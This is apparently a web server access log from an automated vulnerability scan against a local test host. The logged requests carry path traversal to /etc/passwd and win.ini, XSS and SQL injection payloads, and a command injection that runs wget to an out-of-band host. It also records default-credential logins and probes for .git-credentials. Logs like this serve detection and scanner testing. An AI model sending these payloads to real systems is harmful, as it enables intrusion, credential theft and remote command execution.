+{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29K6BgkwCWBWTfZ2LQgp0QaFRiw?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"page=login_change&oper=0&username=admin&password=conel&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/..%5C..%5C..%5CHttp%5Cwebroot%5Cconfig.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http_header.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.txt\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0APOC_TEST\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opensso/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/beans HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Electron/download/windows/%5Cwindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Thumbs.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=admin/views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"submitId=debug&debugCmd=wget+http://ca27l3osmpvb3nig07h0tjd3jeqkcxorr.oast.me&submitEnd=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.htm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=views/ajax/autocomplete/user/a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main.php.bak HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PURGE / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PURGE", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/UI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.../.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /showfile.php?file=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.git-credentials HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:32 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 